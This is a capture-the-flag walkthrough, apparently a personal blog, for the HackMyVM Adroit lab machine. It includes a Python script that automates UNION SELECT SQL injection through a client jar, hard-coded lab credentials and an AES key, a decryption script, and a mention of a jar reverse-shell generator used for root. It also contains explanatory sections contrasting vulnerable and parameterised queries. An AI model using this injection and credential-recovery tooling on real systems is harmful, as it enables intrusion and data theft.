Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Adroit Walkthrough (very tricky)

The machine can be downloaded here.

Nmap scan for open ports first.

[screenshot]


Start with port 21. Log in to FTP as the anonymous user and download all three files.

[screenshot]

Here's note.txt.

[screenshot]


Check structure.PNG, which shows how the jar program is meant to work: the client never talks to the MySQL database directly, only to a proxy sitting in the middle.

[screenshot]

Now the most important part: the jar. Running it as-is does nothing visible, so we open it in jd-gui to see what it is trying to do.

From the decompiled Java code we learn three things:

(1) The jar uses AES plus Base64 to encrypt and decrypt the username and password it needs to connect to the proxy.

(2) The proxy is located at adroit.local:3000.

(3) The username and password for the proxy, hard-coded in the jar.

[screenshot]


We add adroit.local to /etc/hosts and run the jar again. This time it works and asks for a username and password; entering the user:pass pair from the decompiled jar gets us to the operation step.

[screenshot]

After a few tests we know that the "post" operation just stores something in the database under an identifier (the identifier must be a number).

[screenshot]

And the "get" operation just loads whatever was stored under that identifier from the database.

[screenshot]

Testing the other two ports, 3306 and 33060, gets us no access, so the focus stays on this app. Since "get" passes a number straight through to the database, it may be open to SQL injection, and in fact the identifier is vulnerable to a MySQL UNION SELECT injection.

Because the jar exits after every operation, we write a little script to automate the injection. The code is below:

import subprocess

JAR = ['java', '-jar', 'adroitclient.jar']
USER, PASSWORD = 'zeus', 'god.thunder.olympus'   # proxy credentials from the decompiled jar

def run_get(payload):
    """Start a fresh client, log in, pick "get" and send one identifier (the injection point).
    The jar exits after the operation, so every payload needs a new process."""
    p = subprocess.Popen(JAR, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         bufsize=1, encoding='utf-8')          # text mode, line buffered
    for answer in (USER, PASSWORD, 'get'):
        p.stdout.readline()                                    # consume the prompt line
        p.stdin.write(answer + '\n')
        p.stdin.flush()
    p.stdout.readline()                                        # prompt for the identifier
    out, _ = p.communicate(payload + '\n')                     # send the payload, read until the jar exits
    return out

try:
    while True:
        cmd = input("Please input your mysql injection command:\n")
        print(run_get(cmd))
except KeyboardInterrupt:
    pass


The injection itself is the usual UNION SELECT enumeration. In the end we get a username and a password "hash".

[screenshot]
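To make the injection concrete, here is an added example that models the "get" operation in SQLite as a stand-in for MySQL; it is not code from the post or from the Adroit VM. The proxy's real query and table names are not shown on the page, so the schema, the stored credential and the function names below are constructed for the example. The vulnerable version splices the identifier into the SQL text, which is why a numeric field needs no quote to break out of; the hardened version insists on an integer and binds it as a parameter.

```python
import sqlite3

# Constructed stand-in for the database behind the Adroit proxy, kept in memory.
# The real schema is not shown on the page: table/column names and the stored
# credential here are assumptions made for this example.
SEED_SQL = """
CREATE TABLE data  (id INTEGER PRIMARY KEY, content TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO data  VALUES (1, 'hello'), (2, 'world');
INSERT INTO users VALUES ('example_user', 'ExampleBase64Blob==');
"""


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SEED_SQL)
    return db


def get_vulnerable(ident):
    """Model of the proxy's "get": the identifier is pasted straight into the SQL text.
    The column is numeric, so no quote is needed; '0 UNION SELECT ...' simply appends
    rows from any other table to the (empty) result for id 0."""
    db = fresh_db()
    sql = f"SELECT content FROM data WHERE id = {ident}"
    return [row[0] for row in db.execute(sql)]


def get_hardened(ident):
    """The same lookup done safely: reject anything that is not an integer, then bind
    the value as a parameter so it can never become part of the SQL text."""
    ident = int(ident)                      # ValueError for 'UNION ...' and friends
    db = fresh_db()
    return [row[0] for row in db.execute(
        "SELECT content FROM data WHERE id = ?", (ident,))]


def compare(ident):
    """Run one identifier through both versions and report what each returns."""
    try:
        hardened = get_hardened(ident)
    except ValueError:
        hardened = "rejected"
    return {"vulnerable": get_vulnerable(ident), "hardened": hardened}


if __name__ == "__main__":
    for ident in ("1",
                  "0 UNION SELECT username FROM users",
                  "0 UNION SELECT password FROM users"):
        print(f"{ident!r:40} -> {compare(ident)}")
```

UNION requires both halves to return the same number of columns, so against a single-column "get" query you pull one column per payload (or CONCAT() several into one); on MySQL the table and column names themselves come from information_schema.tables and information_schema.columns by the same technique.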


Now we need to recover the password from this "hash", but it is not in any standard hash format: it is Base64 text, not a hex digest.

[screenshot]


So let's reuse the key and the decryption routine from the jar and give that a try. A Python port of it is below.

import base64
from Crypto.Cipher import AES            # pycryptodome
from Crypto.Util.Padding import unpad

secret = "Sup3rS3cur3Dr0it"              # AES key recovered from the decompiled jar
enc_text = "l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY="   # the "hash" pulled out of the database

# AES in ECB mode (pycrypto's old default); pycryptodome wants a bytes key and an explicit mode
cipher = AES.new(secret.encode(), AES.MODE_ECB)
plain = cipher.decrypt(base64.b64decode(enc_text))
try:
    plain = unpad(plain, AES.block_size)  # PKCS#7 padding only checks out when the ciphertext is intact
except ValueError:
    pass                                  # a corrupted last block leaves garbage: show it as-is
print(plain.decode('utf-8', 'ignore'))

But the output is not a complete string: the first part is readable, while the last several characters fail to decode.

[screenshot]

After a long time of trial and error, I asked the author for help. He told me to check the VM description.

[screenshot]


After changing a 0 to an O in the password hash, we get the correct password.

[screenshot]
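Why only the tail of the decryption was garbled, and how that narrows down which character was mis-copied, as an added example that is not part of the original post. It assumes AES in ECB mode, which is what the decryption script above relies on: in ECB each 16-byte block decrypts on its own, so one wrong Base64 character corrupts exactly the block that its bytes land in. The Base64 string is the one from the page; the function names are mine.

```python
import base64

BLOCK = 16   # AES block size; in ECB mode every 16-byte block decrypts independently

# The Base64 "hash" pulled from the database (value from the page), whose second half
# decrypted to garbage while the first half was readable.
ENC_TEXT = "l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY="

# The confusable pair the VM description hints at: a zero copied as a capital O or vice versa.
CONFUSABLE = {"0": "O", "O": "0"}


def variants(b64):
    """Every single-character 0<->O substitution of b64, as (index, candidate) pairs."""
    return [(i, b64[:i] + CONFUSABLE[ch] + b64[i + 1:])
            for i, ch in enumerate(b64) if ch in CONFUSABLE]


def changed_blocks(b64_a, b64_b):
    """Indices of the 16-byte ciphertext blocks that differ between two Base64 strings."""
    a, b = base64.b64decode(b64_a), base64.b64decode(b64_b)
    return [k for k in range(len(a) // BLOCK)
            if a[k * BLOCK:(k + 1) * BLOCK] != b[k * BLOCK:(k + 1) * BLOCK]]


def triage(b64):
    """Map each candidate substitution to the ciphertext block(s) it would change.
    A Base64 character covers at most two adjacent bytes, so it touches one block,
    or two only when it straddles a block boundary."""
    return {i: changed_blocks(b64, cand) for i, cand in variants(b64)}


def candidates_for_block(b64, block):
    """Substitutions that change only the given block. With ECB, a garbled block k means
    the mis-copied character must live inside block k, so only these are worth trying."""
    return sorted(i for i, blocks in triage(b64).items() if blocks == [block])


if __name__ == "__main__":
    print("ciphertext is", len(base64.b64decode(ENC_TEXT)), "bytes")
    for i, blocks in triage(ENC_TEXT).items():
        print(f"flip index {i} ({ENC_TEXT[i]!r}) -> changes block(s) {blocks}")
    print("only the second block was garbage, so try indices:",
          candidates_for_block(ENC_TEXT, 1))
```

The string has two zeros, at indices 16 and 22. The first one encodes byte 12, inside the first block, which decrypted cleanly; the second encodes bytes 16 and 17, the start of the second block. So the block arithmetic alone says the zero that had to be an O is the one at index 22, before trying a single decryption.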

Now we can log in over SSH, and sudo -l gives us a hint.

[screenshot]


Because I'm not a good Java coder, I downloaded a jar reverse-shell generator from the internet.

In the end, we get root.

[screenshot]
